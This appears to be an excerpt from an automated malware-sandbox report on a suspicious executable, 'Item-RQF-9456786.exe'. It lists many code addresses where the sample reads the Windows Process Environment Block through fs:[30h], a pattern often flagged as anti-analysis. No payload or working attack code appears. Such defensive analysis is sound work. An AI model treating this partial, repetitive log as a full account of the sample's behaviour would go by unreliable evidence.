    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D0124 mov eax, dword ptr fs:[00000030h]5_2_017D0124
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018761E5 mov eax, dword ptr fs:[00000030h]5_2_018761E5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D01F8 mov eax, dword ptr fs:[00000030h]5_2_017D01F8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01860115 mov eax, dword ptr fs:[00000030h]5_2_01860115
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184A118 mov ecx, dword ptr fs:[00000030h]5_2_0184A118
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01834144 mov ecx, dword ptr fs:[00000030h]5_2_01834144
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01838158 mov eax, dword ptr fs:[00000030h]5_2_01838158
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E0185 mov eax, dword ptr fs:[00000030h]5_2_017E0185
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CC073 mov eax, dword ptr fs:[00000030h]5_2_017CC073
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2050 mov eax, dword ptr fs:[00000030h]5_2_017A2050
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018380A8 mov eax, dword ptr fs:[00000030h]5_2_018380A8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018660B8 mov eax, dword ptr fs:[00000030h]5_2_018660B8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018660B8 mov ecx, dword ptr fs:[00000030h]5_2_018660B8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A020 mov eax, dword ptr fs:[00000030h]5_2_0179A020
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C020 mov eax, dword ptr fs:[00000030h]5_2_0179C020
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018220DE mov eax, dword ptr fs:[00000030h]5_2_018220DE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018260E0 mov eax, dword ptr fs:[00000030h]5_2_018260E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824000 mov ecx, dword ptr fs:[00000030h]5_2_01824000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C0F0 mov eax, dword ptr fs:[00000030h]5_2_0179C0F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E20F0 mov ecx, dword ptr fs:[00000030h]5_2_017E20F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A80E9 mov eax, dword ptr fs:[00000030h]5_2_017A80E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0179A0E3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836030 mov eax, dword ptr fs:[00000030h]5_2_01836030
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826050 mov eax, dword ptr fs:[00000030h]5_2_01826050
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A208A mov eax, dword ptr fs:[00000030h]5_2_017A208A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018263C0 mov eax, dword ptr fs:[00000030h]5_2_018263C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185C3CD mov eax, dword ptr fs:[00000030h]5_2_0185C3CD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018443D4 mov eax, dword ptr fs:[00000030h]5_2_018443D4
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018443D4 mov eax, dword ptr fs:[00000030h]5_2_018443D4
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184E3DB mov ecx, dword ptr fs:[00000030h]5_2_0184E3DB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C310 mov ecx, dword ptr fs:[00000030h]5_2_0179C310
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C0310 mov ecx, dword ptr fs:[00000030h]5_2_017C0310
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D63FF mov eax, dword ptr fs:[00000030h]5_2_017D63FF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186A352 mov eax, dword ptr fs:[00000030h]5_2_0186A352
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01848350 mov ecx, dword ptr fs:[00000030h]5_2_01848350
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov ecx, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C438F mov eax, dword ptr fs:[00000030h]5_2_017C438F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C438F mov eax, dword ptr fs:[00000030h]5_2_017C438F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184437C mov eax, dword ptr fs:[00000030h]5_2_0184437C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179826B mov eax, dword ptr fs:[00000030h]5_2_0179826B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov ecx, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6259 mov eax, dword ptr fs:[00000030h]5_2_017A6259
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179A250 mov eax, dword ptr fs:[00000030h]5_2_0179A250
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179823B mov eax, dword ptr fs:[00000030h]5_2_0179823B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01828243 mov eax, dword ptr fs:[00000030h]5_2_01828243
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01828243 mov ecx, dword ptr fs:[00000030h]5_2_01828243
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836500 mov eax, dword ptr fs:[00000030h]5_2_01836500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A25E0 mov eax, dword ptr fs:[00000030h]5_2_017A25E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A65D0 mov eax, dword ptr fs:[00000030h]5_2_017A65D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE59C mov eax, dword ptr fs:[00000030h]5_2_017DE59C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D4588 mov eax, dword ptr fs:[00000030h]5_2_017D4588
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2582 mov eax, dword ptr fs:[00000030h]5_2_017A2582
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2582 mov ecx, dword ptr fs:[00000030h]5_2_017A2582
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
